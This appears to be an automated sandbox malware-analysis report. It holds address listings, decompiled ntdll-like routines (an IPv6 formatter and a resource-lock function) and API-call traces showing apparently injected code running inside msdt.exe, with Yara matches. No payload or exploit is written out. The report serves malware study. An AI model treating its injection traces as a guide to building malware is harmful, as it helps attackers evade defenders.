                                                                            0x00c12305
                                                                            0x00c12314
                                                                            0x00c12319
                                                                            0x00c1231a
                                                                            0x00c1231d
                                                                            0x00c12320
                                                                            0x00c12323
                                                                            0x00c12323
                                                                            0x00c12328
                                                                            0x00c1232d
                                                                            0x00c1232f
                                                                            0x00c12331
                                                                            0x00c12336
                                                                            0x00c12336
                                                                            0x00c1233b
                                                                            0x00c1233d
                                                                            0x00c12350
                                                                            0x00c12351
                                                                            0x00c12356
                                                                            0x00c12359
                                                                            0x00c12359
                                                                            0x00c1235b
                                                                            0x00c1235d
                                                                            0x00bd5367
                                                                            0x00bd536b
                                                                            0x00bd5372
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c12363
                                                                            0x00c12363
                                                                            0x00c12369
                                                                            0x00c1236a
                                                                            0x00c1236c
                                                                            0x00c12371
                                                                            0x00c12373
                                                                            0x00000000
                                                                            0x00c12379
                                                                            0x00c12379
                                                                            0x00c1237a
                                                                            0x00c1237f
                                                                            0x00c1237f
                                                                            0x00c12385
                                                                            0x00c12386
                                                                            0x00c12389
                                                                            0x00c1238e
                                                                            0x00c12390
                                                                            0x00bd5378
                                                                            0x00bd537c
                                                                            0x00c12396
                                                                            0x00c12396
                                                                            0x00c12397
                                                                            0x00c1239c
                                                                            0x00c123a2
                                                                            0x00c123a3
                                                                            0x00c123a6
                                                                            0x00c123ab
                                                                            0x00c123ad
                                                                            0x00000000
                                                                            0x00c123b3
                                                                            0x00c123b3
                                                                            0x00c123b4
                                                                            0x00c123b9
                                                                            0x00c123ba
                                                                            0x00c123ba
                                                                            0x00c123bc
                                                                            0x00c123bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c09153
                                                                            0x00c09158
                                                                            0x00c0915a
                                                                            0x00c0915e
                                                                            0x00c09160
                                                                            0x00000000
                                                                            0x00c09166
                                                                            0x00c09166
                                                                            0x00c09171
                                                                            0x00c09176
                                                                            0x00c09176
                                                                            0x00000000
                                                                            0x00c09160
                                                                            0x00c123c6
                                                                            0x00c123ce
                                                                            0x00c123d7
                                                                            0x00c123d7
                                                                            0x00c123ad
                                                                            0x00c12390
                                                                            0x00c12373
                                                                            0x00c1233f
                                                                            0x00c1233f
                                                                            0x00000000
                                                                            0x00c1233f
                                                                            0x00c12291
                                                                            0x00c12291
                                                                            0x00c12293
                                                                            0x00c12295
                                                                            0x00c1229a
                                                                            0x00c122a1
                                                                            0x00c122a3
                                                                            0x00c122a7
                                                                            0x00c122a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122ab
                                                                            0x00c122ad
                                                                            0x00c122af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122af
                                                                            0x00c122b1
                                                                            0x00c122b4
                                                                            0x00c122b4
                                                                            0x00c122b6
                                                                            0x00bd53be
                                                                            0x00bd53be
                                                                            0x00bd53be
                                                                            0x00bd53c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00bd53cb
                                                                            0x00bd53ce
                                                                            0x00bd53d0
                                                                            0x00bd53d4
                                                                            0x00bd53d6
                                                                            0x00000000
                                                                            0x00bd53d8
                                                                            0x00bd53e3
                                                                            0x00bd53ea
                                                                            0x00bd53ea
                                                                            0x00000000
                                                                            0x00bd53d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122b6
                                                                            0x00000000
                                                                            0x00c1228f
                                                                            0x00c12349
                                                                            0x00c1234d
                                                                            0x00c12251
                                                                            0x00c12251
                                                                            0x00000000
                                                                            0x00c12251
                                                                            0x00c121a4
                                                                            0x00c121a4
                                                                            0x00c121a6
                                                                            0x00c121a8
                                                                            0x00c121ac
                                                                            0x00c121b6
                                                                            0x00c121b8
                                                                            0x00c121bc
                                                                            0x00c121be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121c0
                                                                            0x00c121c2
                                                                            0x00c121c4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121c4
                                                                            0x00c121c6
                                                                            0x00c121c6
                                                                            0x00c121c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121c8
                                                                            0x00c121a2
                                                                            0x00000000
                                                                            0x00c12183
                                                                            0x00bf057b
                                                                            0x00bf057d
                                                                            0x00bf0581
                                                                            0x00bf0583
                                                                            0x00c12178
                                                                            0x00000000
                                                                            0x00bf0589
                                                                            0x00bf058f
                                                                            0x00bf058f
                                                                            0x00bf0583
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C12206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-4236105082
                                                                            • Opcode ID: 22153acd8f0e9687bc20a839677cc7d9518d9e6672fc7812111b56cbb47c69e3
                                                                            • Instruction ID: e7b4650807b0b2047c9d3b53b49c127e6ab86bf8292a0c7ccfe61590dc098b3d
                                                                            • Opcode Fuzzy Hash: 22153acd8f0e9687bc20a839677cc7d9518d9e6672fc7812111b56cbb47c69e3
                                                                            • Instruction Fuzzy Hash: 50515B357002426FEB14CA18CCC1FEA33E9AF95720F218269FD58DB2C6DA71ED919790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
                                                                            			/*
                                                                            			 * Decompiled from the process-5 memory dump at 0xB90000 (dump sources listed
                                                                            			 * above). Editor's reading of the routine: it renders a 16-byte IPv6 address
                                                                            			 * as wide text, optionally wrapped as "[addr%scope]:port", and copies it into
                                                                            			 * a caller buffer after a length check. The argument checks, the three format
                                                                            			 * strings and the 0xC000000D (STATUS_INVALID_PARAMETER) return are consistent
                                                                            			 * with ntdll's RtlIpv6AddressToStringExW; treat that as an assessment, not a
                                                                            			 * fact the report states. Assumed argument roles: _a4 address, _a8 scope id,
                                                                            			 * _a12 port, _a16 output buffer, _a20 in/out length in wide characters.
                                                                            			 */
                                                                            			E00BF14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                            				signed int _v8;
                                                                            				char _v10;
                                                                            				char _v140;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t24;
                                                                            				void* _t26;
                                                                            				void* _t28;         // added: used below but left undeclared by the decompiler (write cursor)
                                                                            				signed int _t29;
                                                                            				signed int _t34;
                                                                            				signed int _t40;
                                                                            				intOrPtr _t45;
                                                                            				void* _t51;
                                                                            				intOrPtr* _t52;
                                                                            				signed int _t53;    // added: undeclared by the decompiler; reused as both address pointer and length
                                                                            				void* _t54;
                                                                            				signed int _t57;
                                                                            				void* _t58;
                                                                            
                                                                            				_t51 = __edx;
                                                                            				_t24 =  *0xc92088; // 0x752bba0c  -- stack-cookie seed; the XOR with ebp is verified by E00BBE1B4 at return
                                                                            				_v8 = _t24 ^ _t57;
                                                                            				_t45 = _a16;       // output buffer
                                                                            				_t53 = _a4;        // address
                                                                            				_t52 = _a20;       // in/out length pointer
                                                                            				if(_a4 == 0 || _t52 == 0) {
                                                                            					L10:
                                                                            					_t26 = 0xc000000d; // STATUS_INVALID_PARAMETER
                                                                            				} else {
                                                                            					if(_t45 == 0) {
                                                                            						// NULL output buffer is accepted only with *length == 0 (length query)
                                                                            						if( *_t52 == _t45) {
                                                                            							goto L3;
                                                                            						} else {
                                                                            							goto L10;
                                                                            						}
                                                                            					} else {
                                                                            						L3:
                                                                            						_t28 =  &_v140;    // local scratch buffer; 0x41 wide chars are passed as its capacity below
                                                                            						if(_a12 != 0) {
                                                                            							// port present: open the bracket first (presumably a wide literal; the decompiler prints it narrow)
                                                                            							_push("[");
                                                                            							_push(0x41);
                                                                            							_push( &_v140);
                                                                            							_t29 = E00BE7707(); // ___swprintf_l (see APIs below)
                                                                            							_t58 = _t58 + 0xc;
                                                                            							_t28 = _t57 + _t29 * 2 - 0x88; // &_v140 + chars written * sizeof(wchar_t)
                                                                            						}
                                                                            						_t54 = E00BF13CB(_t53, _t28); // address-to-text helper (itself calls ___swprintf_l); returns the write cursor
                                                                            						if(_a8 != 0) {
                                                                            							// scope id: "%<scope>"; remaining capacity is (&_v10 - cursor) / 2 wide chars
                                                                            							_t34 = E00BE7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                            							_t58 = _t58 + 0x10;
                                                                            							_t54 = _t54 + _t34 * 2;
                                                                            						}
                                                                            						if(_a12 != 0) {
                                                                            							// port: close the bracket and append ":<port>" (16-bit port)
                                                                            							_t40 = E00BE7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                            							_t58 = _t58 + 0x10;
                                                                            							_t54 = _t54 + _t40 * 2;
                                                                            						}
                                                                            						_t53 = (_t54 -  &_v140 >> 1) + 1; // required length in wide chars, terminator included
                                                                            						// As decompiled, the required length is stored before it is compared, so the
                                                                            						// branch below can never be taken. This is most likely a decompiler artifact of
                                                                            						// "compare the caller's length, then write back the required length"; confirm
                                                                            						// against the disassembly before relying on either ordering.
                                                                            						 *_t52 = _t53;
                                                                            						if( *_t52 < _t53) {
                                                                            							goto L10;
                                                                            						} else {
                                                                            							E00BB2340(_t45,  &_v140, _t53 + _t53); // copy required length * 2 bytes to the output buffer
                                                                            							_t26 = 0; // STATUS_SUCCESS
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return E00BBE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53); // stack-cookie check, then return status
                                                                            			}
                                                                            (Address column for the decompiled function above: per-line code addresses only, 0x00bf14c0..0x00c1ea58 with 0x00000000 for lines without code; the original listing pairs each address with the C line it belongs to.)

                                                                            APIs
                                                                            • ___swprintf_l.LIBCMT ref: 00C1EA22
                                                                              • Part of subcall function 00BF13CB: ___swprintf_l.LIBCMT ref: 00BF146B
                                                                              • Part of subcall function 00BF13CB: ___swprintf_l.LIBCMT ref: 00BF1490
                                                                            • ___swprintf_l.LIBCMT ref: 00BF156D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 12dd0f3324beab572a187e7ce7656837561edc148f5b6515a60ebbc41577367e
                                                                            • Instruction ID: 14ec184009809b663bac8c9a13f09f193422f1af5559ec8131fd97b2e3e426f3
                                                                            • Opcode Fuzzy Hash: 12dd0f3324beab572a187e7ce7656837561edc148f5b6515a60ebbc41577367e
                                                                            • Instruction Fuzzy Hash: 8D21807290021DEBCB21DE58CC41AFE77ECEB60700F5449A5EE56E3140DB70DA588BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 45%
                                                                            			E00BD53A5(signed int _a4, char _a8) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t32;
                                                                            				signed int _t37;
                                                                            				signed int _t40;
                                                                            				signed int _t42;
                                                                            				void* _t45;
                                                                            				intOrPtr _t46;
                                                                            				void* _t48;
                                                                            				signed int _t49;
                                                                            				void* _t51;
                                                                            				signed int _t57;
                                                                            				signed int _t64;
                                                                            				signed int _t71;
                                                                            				void* _t74;
                                                                            				intOrPtr _t78;
                                                                            				signed int* _t79;
                                                                            				void* _t85;
                                                                            				signed int _t86;
                                                                            				signed int _t92;
                                                                            				void* _t104;
                                                                            				void* _t105;
                                                                            
                                                                            				_t64 = _a4;
                                                                            				_t32 =  *(_t64 + 0x28);
                                                                            				_t71 = _t64 + 0x28;
                                                                            				_push(_t92);
                                                                            				if(_t32 < 0) {
                                                                            					_t78 =  *[fs:0x18];
                                                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                            						goto L3;
                                                                            					} else {
                                                                            						__eflags = _t32 | 0xffffffff;
                                                                            						asm("lock xadd [ecx], eax");
                                                                            						return 1;
                                                                            					}
                                                                            				} else {
                                                                            					L3:
                                                                            					_push(_t86);
                                                                            					while(1) {
                                                                            						L4:
                                                                            						__eflags = _t32;
                                                                            						if(_t32 == 0) {
                                                                            							break;
                                                                            						}
                                                                            						__eflags = _a8;
                                                                            						if(_a8 == 0) {
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						} else {
                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                            							_t79 = _t64 + 0x24;
                                                                            							_t71 = 1;
                                                                            							asm("lock xadd [eax], ecx");
                                                                            							_t32 =  *(_t64 + 0x28);
                                                                            							_a4 = _t32;
                                                                            							__eflags = _t32;
                                                                            							if(_t32 != 0) {
                                                                            								L19:
                                                                            								_t86 = 0;
                                                                            								__eflags = 0;
                                                                            								while(1) {
                                                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                            									asm("sbb esi, esi");
                                                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00c901c0;
                                                                            									_push(_t92);
                                                                            									_push(0);
                                                                            									_t37 = L00BAF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                            									__eflags = _t37 - 0x102;
                                                                            									if(_t37 != 0x102) {
                                                                            										break;
                                                                            									}
                                                                            									_t71 =  *(_t92 + 4);
                                                                            									_t85 =  *_t92;
                                                                            									_t51 = L00BF4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                            									_push(_t85);
                                                                            									_push(_t51);
                                                                            									L00C03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                            									L00C03F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                            									_t86 = _t86 + 1;
                                                                            									_t105 = _t104 + 0x28;
                                                                            									__eflags = _t86 - 2;
                                                                            									if(__eflags > 0) {
                                                                            										E00C3217A(_t71, __eflags, _t64);
                                                                            									}
                                                                            									_push("RTL: Re-Waiting\n");
                                                                            									_push(0);
                                                                            									_push(0x65);
                                                                            									L00C03F92();
                                                                            									_t104 = _t105 + 0xc;
                                                                            								}
                                                                            								__eflags = _t37;
                                                                            								if(__eflags < 0) {
                                                                            									_push(_t37);
                                                                            									L00BF3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                            									asm("int3");
                                                                            									_t40 =  *_t71;
                                                                            									 *_t71 = 0;
                                                                            									__eflags = _t40;
                                                                            									if(_t40 == 0) {
                                                                            										L1:
                                                                            										_t42 = E00BD5384(_t92 + 0x24);
                                                                            										if(_t42 != 0) {
                                                                            											goto L31;
                                                                            										} else {
                                                                            											goto L2;
                                                                            										}
                                                                            									} else {
                                                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                            										_push( &_a4);
                                                                            										_push(_t40);
                                                                            										_t49 = L00BAF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                            										__eflags = _t49;
                                                                            										if(__eflags >= 0) {
                                                                            											goto L1;
                                                                            										} else {
                                                                            											_push(_t49);
                                                                            											L00BF3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                            											L31:
                                                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                            											_push( &_a4);
                                                                            											_push(1);
                                                                            											_t42 = L00BAF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                            											__eflags = _t42;
                                                                            											if(__eflags >= 0) {
                                                                            												L2:
                                                                            												return _t42;
                                                                            											} else {
                                                                            												_push(_t42);
                                                                            												L00BF3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                            												_push( &_a4);
                                                                            												_push(1);
                                                                            												_t42 = L00BAF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                            												__eflags = _t42;
                                                                            												if(__eflags >= 0) {
                                                                            													goto L2;
                                                                            												} else {
                                                                            													_push(_t42);
                                                                            													_t45 = L00BF3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                            													asm("int3");
                                                                            													while(1) {
                                                                            														_t74 = _t45;
                                                                            														__eflags = _t45 - 1;
                                                                            														if(_t45 != 1) {
                                                                            															break;
                                                                            														}
                                                                            														_t86 = _t86 | 0xffffffff;
                                                                            														_t45 = _t74;
                                                                            														asm("lock cmpxchg [ebx], edi");
                                                                            														__eflags = _t45 - _t74;
                                                                            														if(_t45 != _t74) {
                                                                            															continue;
                                                                            														} else {
                                                                            															_t46 =  *[fs:0x18];
                                                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                            															return _t46;
                                                                            														}
                                                                            														goto L38;
                                                                            													}
                                                                            													E00BD5329(_t74, _t92);
                                                                            													_push(1);
                                                                            													_t48 = E00BD53A5(_t92);
                                                                            													return _t48;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									_t32 =  *(_t64 + 0x28);
                                                                            									continue;
                                                                            								}
                                                                            							} else {
                                                                            								_t71 =  *_t79;
                                                                            								__eflags = _t71;
                                                                            								if(__eflags > 0) {
                                                                            									while(1) {
                                                                            										_t57 = _t71;
                                                                            										asm("lock cmpxchg [edi], esi");
                                                                            										__eflags = _t57 - _t71;
                                                                            										if(_t57 == _t71) {
                                                                            											break;
                                                                            										}
                                                                            										_t71 = _t57;
                                                                            										__eflags = _t57;
                                                                            										if(_t57 > 0) {
                                                                            											continue;
                                                                            										}
                                                                            										break;
                                                                            									}
                                                                            									_t32 = _a4;
                                                                            									__eflags = _t71;
                                                                            								}
                                                                            								if(__eflags != 0) {
                                                                            									continue;
                                                                            								} else {
                                                                            									goto L19;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						goto L38;
                                                                            					}
                                                                            					_t71 = _t71 | 0xffffffff;
                                                                            					_t32 = 0;
                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                            					__eflags = 0;
                                                                            					if(0 != 0) {
                                                                            						goto L4;
                                                                            					} else {
                                                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                            						return 1;
                                                                            					}
                                                                            				}
                                                                            				L38:
                                                                            			}

                                                                            0x00c12359
                                                                            0x00c1235b
                                                                            0x00c1235d
                                                                            0x00bd5367
                                                                            0x00bd536b
                                                                            0x00bd5372
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c12363
                                                                            0x00c12363
                                                                            0x00c12369
                                                                            0x00c1236a
                                                                            0x00c1236c
                                                                            0x00c12371
                                                                            0x00c12373
                                                                            0x00000000
                                                                            0x00c12379
                                                                            0x00c12379
                                                                            0x00c1237a
                                                                            0x00c1237f
                                                                            0x00c1237f
                                                                            0x00c12385
                                                                            0x00c12386
                                                                            0x00c12389
                                                                            0x00c1238e
                                                                            0x00c12390
                                                                            0x00bd5378
                                                                            0x00bd537c
                                                                            0x00c12396
                                                                            0x00c12396
                                                                            0x00c12397
                                                                            0x00c1239c
                                                                            0x00c123a2
                                                                            0x00c123a3
                                                                            0x00c123a6
                                                                            0x00c123ab
                                                                            0x00c123ad
                                                                            0x00000000
                                                                            0x00c123b3
                                                                            0x00c123b3
                                                                            0x00c123b4
                                                                            0x00c123b9
                                                                            0x00c123ba
                                                                            0x00c123ba
                                                                            0x00c123bc
                                                                            0x00c123bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c09153
                                                                            0x00c09158
                                                                            0x00c0915a
                                                                            0x00c0915e
                                                                            0x00c09160
                                                                            0x00000000
                                                                            0x00c09166
                                                                            0x00c09166
                                                                            0x00c09171
                                                                            0x00c09176
                                                                            0x00c09176
                                                                            0x00000000
                                                                            0x00c09160
                                                                            0x00c123c6
                                                                            0x00c123cb
                                                                            0x00c123ce
                                                                            0x00c123d7
                                                                            0x00c123d7
                                                                            0x00c123ad
                                                                            0x00c12390
                                                                            0x00c12373
                                                                            0x00c1233f
                                                                            0x00c1233f
                                                                            0x00000000
                                                                            0x00c1233f
                                                                            0x00c12291
                                                                            0x00c12291
                                                                            0x00c12293
                                                                            0x00c12295
                                                                            0x00c1229a
                                                                            0x00c122a1
                                                                            0x00c122a3
                                                                            0x00c122a7
                                                                            0x00c122a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122ab
                                                                            0x00c122ad
                                                                            0x00c122af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122af
                                                                            0x00c122b1
                                                                            0x00c122b4
                                                                            0x00c122b4
                                                                            0x00c122b6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122b6
                                                                            0x00c1228f
                                                                            0x00000000
                                                                            0x00c1226d
                                                                            0x00bd53cb
                                                                            0x00bd53ce
                                                                            0x00bd53d0
                                                                            0x00bd53d4
                                                                            0x00bd53d6
                                                                            0x00000000
                                                                            0x00bd53d8
                                                                            0x00bd53e3
                                                                            0x00bd53ea
                                                                            0x00bd53ea
                                                                            0x00bd53d6
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C122F4
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 00C12328
                                                                            • RTL: Resource at %p, xrefs: 00C1230B
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C122FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-871070163
                                                                            • Opcode ID: 8638ad7559a7488d021d60da932273bc75797f1ba60b217f3c9b6cf4fbdb8592
                                                                            • Instruction ID: 53d8ef4351362bdff22782789f9d1272b8957a073fbba59df232053dc404d8f7
                                                                            • Opcode Fuzzy Hash: 8638ad7559a7488d021d60da932273bc75797f1ba60b217f3c9b6cf4fbdb8592
                                                                            • Instruction Fuzzy Hash: 7D5126716006066BDB20DA68CC81FEB73DCEF55360F1042AAFD59DB281EAB1ED418794
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:2.3%
                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:438
                                                                            Total number of Limit Nodes:64

                                                                            Graph

                                                                            execution_graph (node/edge listing of the rendered graph omitted; API nodes reached in the graph: RtlAllocateHeap, RtlFreeHeap, NtClose, NtCreateFile, NtReadFile, NtAllocateVirtualMemory, RtlDosPathNameToNtPathName_U, LookupPrivilegeValueW, LdrInitializeThunk, LdrLoadDll, CreateProcessInternalW, PostThreadMessageW, CreateThread, SetErrorMode, Sleep)

                                                                            Executed Functions

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 149 985f0-98641 call 991f0 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0009863D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: 01ba565484d457222384f1439decfd61839a5cd3e5c1bdd99fabe67913782f9a
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: 64F0BDB2200208ABCB08CF88DC85EEB77ADBF8C754F158248BA0D97241C630E811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (image not reproduced): 152 986a0-986e9 call 991f0 NtReadFile
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00093D82,5E972F65,FFFFFFFF,?,?,?,00093D82,?,A:,FFFFFFFF,5E972F65,00093D82,?,00000000), ref: 000986E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:
                                                                            • API String ID: 2738559852-3530315832
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 1a58f9cca17ac6bddfd2719e1cd4b851a781f0d66f6a61bca9ddf50481e07014
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: 27F092B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97251D630E8118BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (image not reproduced): 161 98720-98749 call 991f0 NtClose
                                                                            APIs
                                                                            • NtClose.NTDLL(`=,?,?,00093D60,00000000,FFFFFFFF), ref: 00098745
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: `=
                                                                            • API String ID: 3535843008-2762138152
                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction ID: 29cb77522676b964fd194517f3aa3ed4f146088acf8dd417925144a04461edcd
                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction Fuzzy Hash: 9FD01776200218ABDB10EB98CC89EE77BACEF48760F154499BA189B242C530FA0086E0
                                                                            Uniqueness

